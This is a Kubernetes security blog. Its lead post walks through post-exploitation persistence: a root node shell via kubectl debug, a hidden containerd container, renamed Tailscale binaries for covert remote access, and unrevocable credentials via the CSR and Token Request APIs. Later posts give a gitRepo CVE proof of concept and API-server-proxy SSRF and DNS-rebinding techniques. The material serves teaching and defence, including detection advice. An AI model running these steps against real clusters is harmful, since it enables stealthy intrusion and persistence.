Raesene's Ramblings

Beyond the surface - Exploring attacker persistence strategies in Kubernetes

Fri, 12 Sep 2025 10:00:00 +0100

I’ve been doing a talk on Kubernetes post-exploitation for a while now and one of requests has been for a blog post to refer back to, which I’m finally getting around to doing now!

The goal of this talk is to lay out one attack path that attackers might use to retain and expand their access after an initial compromise of a Kubernetes cluster by getting access to an admin’s credentials. It doesn’t cover all the ways that attackers could do this, but provides one path and also hopefully illuminates some of the inner workings and default settings that attackers might exploit as part of their exploits.

There’s a recording of the talk here if you prefer videos, the flow is similar but I have simplified a bit for the latest iteration, thanks to debug profiles! The general story the talk tells is one where attackers have temporary access to a cluster admin’s laptop where the admin has stepped away to take a call and not locked it, and they have to see how to get and keep access to the cluster before the admin comes back.

Initial access

One of the first things an attacker might want to do with credentials is get a root shell on a Kubernetes cluster node as a good spot to look for credentials or plant binaries. With Kubernetes that’s very simple to do as there is functionality built in to the cluster to allow for users with the right levels of access to do that quickly via kubectl debug

A typical command might look like this (just replace the node name with one from your cluster)

kubectl debug node/gke-demo-cluster-default-pool-04a13cdb-5p8d -it --profile=sysadmin --image=busybox

An important point from this command is the --profile switch as it dictates how much access you’ll have to the node. The sysadmin profile provides the highest level of access, so is the most useful for attackers.

Executing Binaries

Once the attacker has shell access to a node, their next instinct is likely to download tools to run. This might not be as simple as it could be as many Kubernetes distributions lock down the Node OS, setting filesystems as read-only or noexec. However, all cluster nodes can do one thing… run containers. So if the attacker can download and run a container on the node, they’re likely to be able to run any programs they like!

Doing this we can take a look at some lesser known features of Kubernetes clusters. In a cluster, all containers are run by a container runtime, typically containerd or CRI-O, and it’s possible to talk directly to those programs if you’re on the node, bypassing the Kubernetes APIs altogether.

In the talk I start by creating a new containerd namespace using the ctr tool. Ctr is very useful as it’s always installed (IME) alongside containerd, so you don’t need to get an external client program. We’re creating a containerd namespace to make it a bit harder for someone looking at the host to spot our container. Importantly containerd namespaces have nothing to do with Kubernetes namespaces, or Linux namespaces.

ctr namespace create sys_net_mon

We create a namespace called sys_net_mon just to make it a bit less obvious than “attackers were here”!. With the namespace created, the next step is to pull down a container image. The one I’m using is docker.io/sysnetmon/systemd_net_mon:latest . Importantly the contents of this container image have nothing to do with systemd or network monitoring! From a security standpoint it’s an important thing to remember that outside of the official or verified images, Docker Hub does no curation of image contents, so anyone can call their images anything!

ctr -n sys_net_mon images pull docker.io/sysnetmon/systemd_net_mon:latest

With the image pulled we can use ctr to start a container

ctr -n sys_net_mon run --net-host -d --mount type=bind,src=/,dst=/host,options=rbind:ro docker.io/sysnetmon/systemd_net_mon:latest sys_net_mon

This container provides us with full access to the hosts filesystem and also the host’s network interfaces which is pretty useful for post-exploitation activity. After that it’s just a question of getting a shell in the container.

ctr -n sys_net_mon run --net-host -d --mount type=bind,src=/,dst=/host,options=rbind:ro docker.io/sysnetmon/systemd_net_mon:latest sys_net_mon

Static Manifests

Another approach which the attackers could use to run a container on the node is static manifests. Most Kubelets will define a directory on the host which it will load static manifests from. These manifests run a pod without any API server necessary. A handy trick for our attackers is to give their static pod an invalid namespace name, as this prevents it being registered with the API server, so it won’t show up in kubectl get pods -A or similar. There’s more details on static pods and some of their security oddness on Iain Smart’s blog

Remote Access

The next problem our attackers have to tackle is retaining remote access to the environment after the admin returns to their laptop. Whilst there are a number of remote access programs available, a lot of the security/hacker related ones will be spotted by EDR/XDR style agents, so an alternative can be using something like Tailscale!

Tailscale has a number of features which are very useful for attackers (in addition to their normal usefulness!). First one is that it can be run with two statically compiled golang binaries that can be renamed. This means that you pick what will show up in the process list of the node. Following the theme of the container image, we use binaries systemd_net_mon_server and systemd_net_mon_client

The first command starts the server

systemd_net_mon_server --tun=userspace-networking --socks5-server=localhost:1055 &

and then we start the client

systemd_net_mon_client up --ssh --hostname cafebot --auth-key=tskey-auth-XXXXX

In terms of network access this will run on only 443/TCP outbound if it uses Tailscale’s DERP network, so that access will probably be allowed in most environments. Also we can use Tailscale’s ACL feature so that our compromised container can’t communicate with any other machines on our Tailnet.

With those services running it should be possible to come back into the container over SSH. Tailscale bundles an SSH server with the program, no SSHD will show as running :)

tailscale ssh root@cafebot

Credentials - Kubelet API

With remote access achieved, our attackers still need long lasting credentials and also it would be nice if they could probe the cluster without touching the Kubernetes API server, as that might show up in audit logs. So to do this they need access to credentials for a user who can talk to the Kubelet API directly. This runs on every node on 10250/TCP and has no auditing option available.

In the talk to do this I use teisteanas which creates Kubeconfig based credentials for users using the Certificiate Signing Request (CSR) API. We can create a set of credentials for any user using this approach. For stealth an attacker would likely choose a user which already has rights assigned to it in RBAC, so they don’t have to create any new cluster roles or cluster role bindings. The exact user to use will vary, but in the demos from the talk I use kube-apiserver which is a user that exists in GKE clusters.

teisteanas -username kube-apiserver -output-file kubelet-user.config

With that Kubeconfig file in hand and access to the Kubelet port on a host, it’s possible to take actions like listing pods on a node or executing commands in those pods. The easiest way to do this is to use kubeletctl. So from our container which is running on the node, using the node’s network namespace, we can run something like this

kubeletctl -s 127.0.0.1 -k kubelet-user.config pods

CSR API

It’s also important to understand a bit about the CSR API as, for attackers, it’s a useful thing to take advantage of. This API exists in pretty much every Kubernetes distribution and can be used to create credentials that authenticate to the cluster, apart from when using EKS as it does not allow that function. Very importantly credentials created via the CSR API can be abused by anyone who has access to the API server. Most managed Kubernetes distributions have chosen to have the Kubernetes API server exposed to the Internet by default, so an attacker who is able to get credentials for a cluster will be able to use them from anywhere in the world!

The CSR API is also attractive to attackers for a number of reasons :-

Unless audit logging is enabled and correctly configured there is no record of the API having been used and the credentials having been created.
Credentials created by this API cannot be revoked without rotating the certificate authority for the whole cluster, which is a disruptive operation. The GitHub issue related to certificate revocation has been open since 2015, so it’s likely this will not change now…
It’s possible to create credentials for generic system accounts, so even if the cluster operator has audit logging enabled, it could be difficult to identify malicious activity.
The credentials tend to be long lived. Whilst this is distribution dependent, generally this is 1-5 years.

In the demos for the talk we’re running against a GKE cluster, so used the CSR API to generate credentials for the system:gke-common-webhooks user which has quite wide ranging privileges.

teisteanas -username system:gke-common-webhooks -output-file webhook.config

Token Request API

Even if the CSR API isn’t available there’s another option built into Kubernetes that can create new credentials, which is the Token Request API. This is used by Kubernetes clusters to create service account tokens, but there’s nothing to stop an administrator who has the correct rights from using it. Similarly to the CSR API there’s no persistent record (apart from audit logs) that new credentials have been created, and they can be hard to revoke if a system level service account has been used, as the only way to revoke the credential is to delete it’s associated service account.

The expiry may be less of a problem, depending on the Kubernetes distribution in use, it can vary from 24 hours maximum to one year, from the managed distributions I’ve looked at.

In the talk I use tocan to simplify the process of creating a Kubeconfig file from a service account token.

tocan -namespace kube-system -service-account clusterrole-aggregation-controller

The service account we clone is an interesting one as it has the “escalate” right, which means it can always become Cluster-admin even if it doesn’t have those rights to begin with. (I’ve written about escalate before)

Detecting these attacks

The talk closes by discussing how to detect and prevent these kind of attacks. For detection there’s a couple of key things to look at

Kubernetes audit logs - This one is very important. You need to have audit logging enabled with centralized logs and good retention, to spot some of the techniques used here, especially abuse of the CSR and Token Request APIs
Node Agents - Having security agents running on cluster nodes could allow for detection of things like the Tailscale traffic, depending on their configuration
Node Logs - Generally ensuring that logs on nodes are properly centralized and stored is going to be important, as attackers can leave traces there.
Know what good looks like - This one sounds simple but possibly isn’t. If you know what processes should be running on your cluster nodes, you can spot things like “systemd_net_mon” when they show up. What’s tricky here is that every distribution has a different set of management services run by the cloud provider, so it’s not a one off effort knowing what should be there.

Preventing these attacks

There are a couple of key ways cluster admins can reduce the risk of this scenario happening to them,

Take your clusters off the Internet!! - Exposing the API server this way means you are one set of lost credentials away from a very bad day. Generally managed Kubernetes distributions will allow you to restrict access, but it’s not the default.
Least Privilege - In this scenario, the compromised laptop had cluster-admin level privileges, enabling the attackers to move through the cluster easily. If the admin had been using an account with fewer privileges, the attacks might well not have succeeded. Whilst some of the rights used, like node debugging, are probably quite commonly used, others like the CSR API and Token Request API probably shouldn’t be needed in day-to-day administration, so could be restricted.

To quote Ian Coldwater

Conclusion

This talk just looks at one path that attackers could take to retain and expand their access to a cluster which they get access to. There are obviously other possibilities, but this can shed some light on some of the ways that Kubernetes works and how to improve your cluster security!

Bitnami Deprecation

Thu, 21 Aug 2025 12:30:00 +0100

Update Looks like Bitnami decided to take some more time over this details here and have some 1-day brown outs before removing the repos on Sept 29.

One constant of modern development environments is the ever increasing number of dependencies, and the problems that come when they get disrupted. Next week there could be a serious disruption in the container image ecosystem as a provider of popular images and helm charts changes their availability and tags.

What’s Happening?

This Github issue has most of the details, but it’s a little hard to work out the exact impact from it. The TL;DR. is that Bitnami are moving from freely available images under the Docker Hub Username bitnami to a split of commercially maintained images under bitnamisecure and unmaintained legacy images under bitnamilegacy.

The exact timing is unclear as the issue mentions gradually move existing ones to the legacy repository, however the impact is going to start in a week’s time starting August 28th 2025, so it’s clear that organizations using these images will need to take action sooner rather than later.

So what’s the impact?

Well if you’re either directly using images from bitnami, Helm charts that reference those images, or images that are built off those base images, you need to start using different images pretty quickly or you might find deploys or image builds failing.

How big of a problem is this?

After reading this, I thought it could be worth looking at how many pulls these images are getting. Luckily Docker Hub provides pull statistics via their API, so by looking at changes over time we can get a reasonable idea of how many people are going to be affected.

Looking at pull statistics for popular bitnami images over the course of 6 days we can see that the most popular image kubectl got 1.86M pulls in that time period, and a large number of images have had over 100K pulls in that time, so it seems like these images are pretty heavily used.

Conclusion

I’ve long said that, when using container images in production, it’s vitally important that you build and maintain all of your own images, or if you want have some kind of commercial maintenance agreement for them. Relying on freely provided externally managed images is a recipe for problems down the line.

For now though, the critical point is that everyone using Bitnami images, needs to go an review all their usage and make a fairly rapid plan to address the risk of them breaking in the near future.

Am I Still Contained?

Mon, 09 Jun 2025 10:30:00 +0100

This exploration started, as many do, with “huh that’s odd”. Specifically I was looking at the output of amicontained around filtered syscalls.

Seccomp: filtering
Blocked Syscalls (54):
        MSGRCV SYSLOG SETSID USELIB USTAT SYSFS VHANGUP PIVOT_ROOT _SYSCTL ACCT SETTIMEOFDAY MOUNT UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME SETDOMAINNAME IOPL IOPERM CREATE_MODULE INIT_MODULE DELETE_MODULE GET_KERNEL_SYMS QUERY_MODULE QUOTACTL NFSSERVCTL GETPMSG PUTPMSG AFS_SYSCALL TUXCALL SECURITY LOOKUP_DCOOKIE CLOCK_SETTIME VSERVER MBIND SET_MEMPOLICY GET_MEMPOLICY KEXEC_LOAD ADD_KEY REQUEST_KEY KEYCTL MIGRATE_PAGES UNSHARE MOVE_PAGES PERF_EVENT_OPEN FANOTIFY_INIT OPEN_BY_HANDLE_AT SETNS KCMP FINIT_MODULE KEXEC_FILE_LOAD BPF USERFAULTFD

Looking at the SYSCALLS that were listed as blocked, I noticed that there wasn’t any mention of IO_URING but I know that Docker blocks io_uring syscalls in the default profile, so what’s going on?

Looking at the source code

I decided to take a look at the source code to see what was going on and why it might not be working. In the seccompIter function I found what looks like a relevant point. A for loop that iterates over each syscall one at a time.

for id := 0; id <= unix.SYS_RSEQ; id++ 

The end point for the loop was a syscall called SYS_RSEQ and thanks to a very helpful lookup table here I could see that that’s syscall 334, and the IO_URING syscalls are 425-427, so we can see why they’re not being flagged, the loop doesn’t go that high!

Fixing the problem

Whilst I’m not a professional developer by any stretch of the imagination (<GEEK REFERENCE> I’d liken myself to a rogue with the use magic device skill trying to get a wand of fireballs working by hitting the end of it </GEEK REFERENCE>), I decided to take a stab at fixing the code to get it to include the IO_URING syscalls (and any other ones with higher numbers).

We could just increase the maximum number on the for loop, but that does run into a problem, which is that there’s a weird gap in the syscall numbers between 334 and 424. It appears that this was done to sync up syscall numbers in different processor architectures, so we can just add a section to the code to skip those blank numbers.

The next tricky part is, it turns out making syscalls directly can sometimes cause the process to exit or hang. The original code has a number of blocks designed to skip tricky syscalls

		// these cause a hang, so just skip
		// rt_sigreturn, select, pause, pselect6, ppoll
		if id == unix.SYS_RT_SIGRETURN || id == unix.SYS_SELECT || id == unix.SYS_PAUSE || id == unix.SYS_PSELECT6 || id == unix.SYS_PPOLL {
			continue
		}

Here the approach ended up being a bit trial and error on what syscalls caused problems. Also an interesting aside is that this shows a limitation of this approach to enumerating syscalls, it’s not possible to get a definitive list as you can’t probe for every possible syscall!

With that largely working, it was just a question of extending the really long syscallName function that has a case statement giving names for every syscall. This was also the only part of this that LLMs could help with (they got the main problem wildly wrong), and even here they only got most of it right.

After all that it looks like this largely works. As the original repository seems unmaintained, I’ve put a fork here with the updated code.

Results

Using the updated code in a Docker container we can see that the number of blocked syscalls has increased from 54 to 68, including the IO_URING ones that started this!

Blocked Syscalls (68):
        SYSLOG SETSID USELIB USTAT SYSFS VHANGUP PIVOT_ROOT _SYSCTL ACCT SETTIMEOFDAY MOUNT UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME SETDOMAINNAME IOPL IOPERM CREATE_MODULE INIT_MODULE DELETE_MODULE GET_KERNEL_SYMS QUERY_MODULE QUOTACTL NFSSERVCTL GETPMSG PUTPMSG AFS_SYSCALL TUXCALL SECURITY LOOKUP_DCOOKIE CLOCK_SETTIME VSERVER MBIND SET_MEMPOLICY GET_MEMPOLICY KEXEC_LOAD ADD_KEY REQUEST_KEY KEYCTL MIGRATE_PAGES UNSHARE MOVE_PAGES PERF_EVENT_OPEN FANOTIFY_INIT OPEN_BY_HANDLE_AT SETNS KCMP FINIT_MODULE KEXEC_FILE_LOAD BPF USERFAULTFD IO_URING_SETUP IO_URING_ENTER IO_URING_REGISTER OPEN_TREE MOVE_MOUNT FSOPEN FSCONFIG FSMOUNT FSPICK PIDFD_GETFD PROCESS_MADVISE MOUNT_SETATTR QUOTACTL_FD LANDLOCK_RESTRICT_SELF SET_MEMPOLICY_HOME_NODE

Conclusion

This one was interesting for a number of reasons. First up was a good reminder that you can’t rely on tools always working the way they used to, as the underlying systems change. The second one was that I learned quite a bit about the limitations of closed box testing of syscalls, and also as a side lesson, the current limitations of LLMs when dealing with relatively obscure lower level tech.

Kubernetes Debug Profiles

Fri, 30 May 2025 17:00:00 +0100

I got a lesson today in the idea that it’s always worth re-visiting things you’ve used in the past to see how they’ve changed, as sometimes there will be cool new features!

In my Kubernetes Post-Exploitation talk I make use of kubectl debug as a means to get a root shell on a cluster node. It’s a very handy command but I thought it wasn’t possible to use ctr commands from inside the shell you get with kubectl debug and that turns out to be outdated information!

What’s the problem?

If you’ve done much with container pentesting or offensive security, you’ll have come across the idea that access to the Docker socket effectively gives root access to the underlying host via The most pointless Docker command ever, and this is true even if you just have a container with that file mounted in.

However in modern Kubernetes clusters, it’s likely that the underlying container runtime is containerd and not Docker. What can be surprising is that the containerd socket works very differently than the Docker one. It assumes that the client program and the containerd server are operating on the same host with the same environment.

(old) kubectl debug

This problem shows up when using the “legacy” profile for kubectl debug node (which is the default if you don’t specify one). Some commands, using the ctr client will work just fine, so things like pulling new images, however when you try to run a new container you’ll get an error like this

ctr: failed to unmount /tmp/containerd-mount2094132404: operation not permitted: failed to mount /tmp/containerd-mount2094132404: operation not permitted

Kubectl debug profiles to the rescue!

Fortunately Kubernetes SIG-CLI have been improving on the initial kubectl debug command by having a set of profiles that you can specify, which provide different sets of rights on the node you’re debugging. The list of available profiles is “legacy”, “general”, “baseline”, “netadmin”, “restricted” or “sysadmin”, with the default being “legacy”.

So I decided to try the commands from my demo, but with the sysadmin profile specified as an option, and it works!

This is very handy if you’re a sysadmin who wants to interact with the containerd socket as part of your troubleshooting, or if you’re an attacker who’s got access to a host and wants to hide some tools in a containerd container!

There are some details on what each of the profiles sets in terms of security options in this KEP

Conclusion

As ever there’s loads of cool new Kubernetes features that come up all the time. I’ve been doing container security things for 9+ years now and I’m still finding interesting things to look at!

Cap or no cap

Wed, 23 Apr 2025 11:00:00 +0100

I was looking at a Kubernetes issue the other day and it led me down a kind of interesting rabbit hole, so I thought it’d be worth sharing as I learned a couple of things.

Background

The issue is to do with the interaction of allowPrivilegeEscalation and added capabilities in a Kubernetes workload specification. In the issue the reporter noted that if you add CAP_SYS_ADMIN to a manifest while setting allowPrivilegeEscalation: false it blocks the deploy but other capabilities when added do not block.

allowPrivilegeEscalation is kind of an interesting flag as it doesn’t really do what the name says. In reality, what it does is set a specific Linux Kernel setting designed to stop a process from getting more privileges than when it started, however the name implies it’s intended to do a more wide ranging set of blocks. My colleague Christophe has a detailed post looking at this misunderstanding.

However what was specifically interesting to me was, when I tried out a quick manifest to re-create the problem, I wasn’t able to and the pod I created was admitted ok.

After a bit of looking I realised that when adding the capability, I’d used the name SYS_ADMIN instead of CAP_SYS_ADMIN, and it had worked fine, weird!

Exploring what’s going on

I decided to put together a couple of quick test cases to understand what’s happening (manifests are here).

capsysadminpod.yaml - This pod adds CAP_SYS_ADMIN to the capabilities list
sysadminpod.yaml - This pod adds SYS_ADMIN to the capabilities list
dontallowprivesccapsysadminpod.yaml - This has allowPrivilegeEscalation: false set and adds CAP_SYS_ADMIN to the capabilities list
dontallowprivescsysadminpod.yaml - This has allowPrivilegeEscalation: false set and adds SYS_ADMIN to the capabilities list
invalidcap.yaml - This pod has an invalid capability (LOREM) set.

Trying these manifests out in a kind cluster (using containerd as CRI) showed a couple of things

Adding CAP_SYS_ADMIN worked but there was no capability added.
Adding SYS_ADMIN worked and the capability was added.
setting allowPrivilegeEscalation: false and adding CAP_SYS_ADMIN was blocked
setting allowPrivilegeEscalation: false and adding SYS_ADMIN was allowed and the capability was added.
setting an invalid capability worked ok but no capability was added.

So a couple of lessons from that. Kubernetes does not check what capabilities you add, and no error is generated if you add an invalid one, it just doesn’t do anything. Also there’s a redundant block in Kubernetes at the moment where something that doesn’t do anything is blocked, but something which does do something is allowed ok…

Doing some more searching on Github turned up some more history on this. Back in 2021, there was a PR to try and fix this which didn’t get merged, and there’s another issue from 2023 on it as well.

From that one thing that caught my eye was that apparently CRI-O handles this differently than containerd, which I thought was interesting

Comparing CRI-O - with iximiuz labs

I wanted to test out this difference in behaviour, but unfortunately I don’t have a CRI-O backed cluster available on my test lab. Fortunately, iximiuz labs has an awesome Kubernetes playground where you can specify various combinations of CRI and CNI to test out different scenarios, which is nice!

Testing out a cluster there with CRI-O confirmed that things are handled rather differently.

Adding CAP_SYS_ADMIN worked and the capability was added.
Adding SYS_ADMIN worked and the capability was added.
setting allowPrivilegeEscalation: false and adding CAP_SYS_ADMIN was blocked
setting allowPrivilegeEscalation: false and adding SYS_ADMIN was allowed and the capability was added.
setting an invalid capability resulted in an error on container creation (CRI-O prepended the capability set with CAP_ and then threw an error stopping pod creation as it was invalid).

So we can see that CRI-O handles things a bit differently, allowing both SYS_ADMIN and CAP_SYS_ADMIN to work and erroring out on invalid capabilities!

Conclusion

Sometimes we can assume that Kubernetes clusters will work the same way, so we can freely move workloads from one to another, regardless of distribution. This case provides an illustration of one way that that assumption might not hold up, and we can see some surprising results!

CVE-2025-1767 - Another gitrepo issue

Fri, 14 Mar 2025 10:00:00 +0000

There’s a new Kubernetes security vulnerability that’s just been disclosed and I thought it was worth taking a look at it, as there’s a couple of interesting aspects to it. CVE-2025-1767 exists in the gitRepo volume type and can allow users who can create pods with gitRepo volumes to get access to any other git repository on the node where the pod is deployed. This is the second recent CVE related to gitRepo volumes, I covered the last one here

Vulnerability and Exploitation

So setting this up is relatively straightforward. Our node OS has to have git installed, which is common but not the case in every distribution, and we need to be able to create pods on that node. With those two pre-requisites in place, we can show how to exploit it.

I’m going to use a kind cluster , so first step is to shell into the cluster and install git, as it’s not included with kind.

kind create cluster

docker exec -it kind-control-plane bash

apt update && apt install -y git

Next we need a “victim” git repository, for this I’ll just clone down one of my repositories into the root of the node’s filesystem.

git clone https://github.com/raesene/TestingScripts/

With that setup done, exit the node shell, and then we can create our “exploit” pod. This is pretty straightforward, all we need is a pod with a gitRepo volume and we specify the repository to pull into the pod using a file path. As the plugin is just running git on the host, it can access that directory just fine and pull it into the pod.

apiVersion: v1
kind: Pod
metadata:
  name: git-repo-pod-test
spec:
  containers:
  - name: git-repo-test-container
    image: raesene/alpine-containertools
    volumeMounts:
    - name: git-volume
      mountPath: /tmp
  volumes:
  - name: git-volume
    gitRepo:
      repository: "/TestingScripts"
      directory: "."

We can then save this as gitrepotest.yaml and apply it to the cluster with

kubectl create -f gitrepotest.yaml

If all works ok, it should be possible to check that the repository has been cloned from the node into the pod

kubectl exec git-repo-pod-test -- ls /tmp

This will show the files from the cloned repository!

Impact & Exploitability

So that’s how it works, is it really a problem? My feeling is that this is quite a situational vulnerability. Essentially the attacker needs to know the path to a git repository on the node, and for it to contain files that they should not have access to. That’s not going to be be every cluster for sure, but there are times when you could see this causing problems

Patching & Mitigation

The patching situation for this vulnerability is interesting. The CVE description says that a patch will not be provided as gitRepo volumes are deprecated, which is true. However, this volume type is enabled by Kubernetes by default and there is no flag or switch that would allow a cluster operator to disable it.

There has been an ongoing discussion on disabling and/or removing this volume type since the last CVE affecting this component, but a decision hasn’t currently been made on its removal.

In practice, if you don’t use gitRepo volumes, you can mitigate this in a couple of ways. If you don’t need git on your nodes you can just remove it there (assuming un-managed Kubernetes of course), and you can also block the use of these volumes using Validating Admission Policy or similar admission controllers. There’s some details in the CVE announcement of a policy that could be used.

One downside that you may encounter here is that I’d imagine that CVE scanners will pick up this vulnerability and as they can’t easily detect the mitigations, and as there are no patches available and all Kubernetes versions are affected, I’d expect this to flag a lot of Kubernetes installations as vulnerable.

Conclusion

Whilst this is a bit of a situational vulnerability, it’s an interesting illustration of how some less well known components of Kubernetes can affect its security.

Exploring the Kubernetes API Server Proxy

Sat, 18 Jan 2025 10:00:00 +0000

For my first post of the year I thought it’d be interesting to look at a lesser known feature of the Kubernetes API server which has some interesting security implications.

The Kubernetes API server can act as an HTTP proxy server, allowing users with the right access to get to applications they might otherwise not be able to reach. This is one of a number of proxies in the Kubernetes world (detailed here) which serve different purposes. The proxy can be used to access pods, services, and nodes in the cluster, we’ll focus on pods and nodes for this post.

How does it work?

Let’s demonstrate how this works with a KinD cluster and some pods. With a standard kind cluster spun up using kind create cluster we can start an echo server so it’ll show us what we’re sending

kubectl run echoserver --image gcr.io/google_containers/echoserver:1.10

Next (just to make things a bit more complex) we’ll start the kubectl proxy on our client to let us send curl requests to the API server more easily

kubectl proxy

With that all in place we can use a curl request from our client to access the echoserver pod via the API server proxy

curl http://127.0.0.1:8001/api/v1/namespaces/default/pods/echoserver:8080/proxy/

And you should get a response that looks a bit like this

Request Information:
        client_address=10.244.0.1
        method=GET
        real path=/
        query=
        request_version=1.1
        request_scheme=http
        request_uri=http://127.0.0.1:8080/

Request Headers:
        accept=*/*
        accept-encoding=gzip
        host=127.0.0.1:45745
        user-agent=curl/8.5.0
        x-forwarded-for=127.0.0.1, 172.18.0.1
        x-forwarded-uri=/api/v1/namespaces/default/pods/echoserver:8080/proxy/

Looking at the response from the echo server we can see some interesting items. The client_address is the API servers address on the pod network, and we can also see the x-forwarded-for and x-forwarded-uri headers are set too.

Graphically the set of connections look a bit like this

In terms of how this feature works, one interesting point to note here is that it’s possible to specify the port that we’re using, so the API server proxy can be used to get to any port.

We can also put in anything that works in a curl request and it will be relayed onwards to the proxy targets, so POST requests, headers with tokens or anything else that’s valid in curl, which makes this pretty powerful.

It’s not just pods that we can proxy to, we can also get to any service running on a node (with an exception we’ll mention in a bit). So for example with our kind cluster setup, we can issue a curl command like

curl http://127.0.0.1:8001/api/v1/nodes/http:kind-control-plane:10256/proxy/healthz

and we get back the kube-proxy’s healthz endpoint information

{"lastUpdated": "2025-01-18 07:58:53.413049689 +0000 UTC m=+930.365308647","currentTime": "2025-01-18 07:58:53.413049689 +0000 UTC m=+930.365308647", "nodeEligible": true}

Security Controls

Obviously this is a fairly powerful feature and not something you’d want to give to just anyone, so what rights do you need and what restrictions are there on its use?

The user making use of the proxy requires rights to the proxy sub-resource of pods or nodes (N.B. Providing node/proxy rights also allows use of the Kubelet APIs more dangerous features).

Additionally there is a check in the API server source code which looks to stop users of this feature from reaching localhost or link-local (e.g. 169.254.169.254) addresses. The function isProxyableHost uses the golang function isGlobalUnicast to check if it’s ok to proxy the requests.

Bypasses and limitations

Now we’ve described a bit about how this feature is used and secured, let’s get on to the fun part, how can it be (mis)used :)

Obviously a server service that lets us proxy requests, is effectively SSRF by design, so it seems likely that there’s are some interesting ways we can use it.

Proxying to addresses outside the cluster

One thing that might be handy if you’re a pentester or perhaps CTF player is being able to use the API server’s network position to get access to other hosts on restricted networks. To do that we’d need to be able to tell the API server proxy to direct traffic to arbitrary IP addresses rather than just pods and nodes inside the cluster.

For this we’ll go to a Kinvolk blog post from 2019, as this technique works fine in 2025!

Essentially, if you own a pod resource you can overwrite the IP address that it has in its status and then proxy to that IP address. It’s a little tricky as the Kubernetes cluster will spot this change as a mistake and will change it back to the valid IP address, so you have to loop the requests to keep it set to the value you want.

#!/bin/bash

set -euo pipefail

readonly PORT=8001
readonly POD=echoserver
readonly TARGETIP=1.1.1.1

while true; do
  curl -v -H 'Content-Type: application/json' \
    "http://localhost:${PORT}/api/v1/namespaces/default/pods/${POD}/status" >"${POD}-orig.json"

  cat $POD-orig.json |
    sed 's/"podIP": ".*",/"podIP": "'${TARGETIP}'",/g' \
      >"${POD}-patched.json"

  curl -v -H 'Content-Type:application/merge-patch+json' \
    -X PATCH -d "@${POD}-patched.json" \
    "http://localhost:${PORT}/api/v1/namespaces/default/pods/${POD}/status"

  rm -f "${POD}-orig.json" "${POD}-patched.json"
done

With this script looping, you can make a request like

curl http://127.0.0.1:8001/api/v1/namespaces/default/pods/echoserver/proxy/

and you’ll get the response from the Target IP (in this case 1.1.1.1)

Fake Node objects

Another route to achieving this goal can be to create fake node objects in the cluster (assuming you’ve got the rights to do that). How well this one works depends a bit on the distribution as some will quickly clean up any fake nodes that are created, but it works fine in vanilla Kubernetes.

What’s handy here is that we can use hostnames instead of just IP addresses so something like

kind: Node
apiVersion: v1
metadata:
  name: fakegoogle
status:
  addresses:
  - address: www.google.com
    type: Hostname

Will then allow us to issue a curl request like

curl http://127.0.0.1:8001/api/v1/nodes/http:fakegoogle:80/proxy/

and get a response from www.google.com.

Getting the API Server to authenticate to itself

An interesting variation on this idea was noted in the Kubernetes 1.24 Security audit and is currently still an open issue so exploitable. This builds on the idea of a fake node by adding additional information to say that the kubelet port on this node is the same as the API server’s port. This causes the API server to authenticate to itself and allows someone with create node and node proxy rights to escalate to full cluster admin.

A YAML like this

kind: Node
apiVersion: v1
metadata:
  name: kindserver
status:
  addresses:
  - address: 172.20.0.3
    type: ExternalIP
  daemonEndpoints:
    kubeletEndpoint:
      Port: 6443

can be applied and then curl commands like the one below get access to the API server

curl http://127.0.0.1:8001/api/v1/nodes/https:kindserver:6443/proxy/

CVE-2020-8562 - Bypassing the blocklist

Another point to note about the API server proxy is that it might be possible to bypass the blocklist that’s in place via a known, but unpatchable, CVE (There’s a great blog with details on the original CVE from the reporter here).

There is a TOCTOU vulnerability in the API servers blocklist checking that means, if you can make requests to an address you control via the API server proxy, you might be able to get the request to go to IP addresses like localhost or the cloud metadata service addresses like 169.254.169.254.

Exploiting this one takes a couple of steps. Firstly we can use a fake node object, as described in the previous section, then we’ll need a DNS service that resolves to different IP addresses alternately.

Fortunately for us, there’s an existing service we can use for the rebinding, https://lock.cmpxchg8b.com/rebinder.html.

kind: Node
apiVersion: v1
metadata:
  name: rebinder
status:
  addresses:
  - address: 2d21209c.7f000001.rbndr.us 
    type: Hostname

With that created we can use the URL below to try and access the configuration of the kube-proxy component which is only listening on localhost.

curl http://127.0.0.1:8001/api/v1/nodes/http:rebinder:10249/proxy/configz

As this is a TOCTOU it can take quite a few attempts to get a response. You should see 3 possibilities. firstly a 400 response which happens when the blocklist check fails. Secondly a 503 response where it goes to the external address (in this case the IP address for scanme.nmap.org) and doesn’t get a response on that URL, and lastly when the TOCTOU is successful you’ll get the response back from the proxy service. I generally have found that < 30 requests is needed for a “hit” using this technique.

One place where this particular technique is interesting is obviously cloud hosted Kubernetes clusters, and in particular managed providers where they probably don’t want cluster operators requesting localhost interfaces on machines they control :)

To mitigate this many of the ones I’ve looked at use Konnectivity which is yet another proxy and can be configured to ensure that any requests that come in from user controlled addresses are routed back to the node network and away from the control plane network.

Conclusion

The Kubernetes API server proxy is a handy feature for a number of reasons but obviously making any service a proxy is a tricky proposition from a security standpoint.

If you’re a cluster operator it’s important to be very careful with who you provide proxy rights to, and if you’re considering creating a managed Kubernetes service where you don’t want cluster owners to have access to the control plane, you’re going to need to be very careful with network firewalling and ensuring that the proxy doesn’t let them get to areas that should be restricted!

When is read-only not read-only?

Mon, 11 Nov 2024 12:00:00 +0000

Bit of a digression from the network series today, to discuss something I just saw in passing which is an interesting example of a possible sharp corner/foot gun in Kubernetes RBAC.

Generally speaking for REST style APIs GET requests are read-only, so shouldn’t change the state of resources or execute commands. As such you might think that giving a user the following rights in Kubernetes would essentially just be giving them read-only access to pod information in the default namespace.

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-reader
  namespace: default
rules:
- apiGroups: [""]
  resources: 
    - "pods"
    - "pods/log"
    - "pods/status"
    - "pods/exec"
    - "pods/attach"
    - "pods/portforward"
  verbs: ["get", "list", "watch"]

However due to the details of how Websockets works with Kubernetes, this access can allow for users to run kubectl exec commands in pods and get command execution rights in that namespace! There’s information on the origins of this in this Github issue but it’s essentially down to how websockets works.

What’s possibly more interesting is that, while this behaviour has been in place for a while you might not have noticed it, as the default in Kubernetes was to use SPDY for exec commands instead of websockets, until Kubernetes version 1.31. So if a user with GET rights on pods/exec tried to use kubectl exec in 1.29 you’d get an error like this

Error from server (Forbidden): pods "test" is forbidden: User "bob" cannot create resource "pods/exec" in API group "" in the namespace "default"

but if a user with the exact same rights, tried the same command in Kubernetes 1.31 it works!

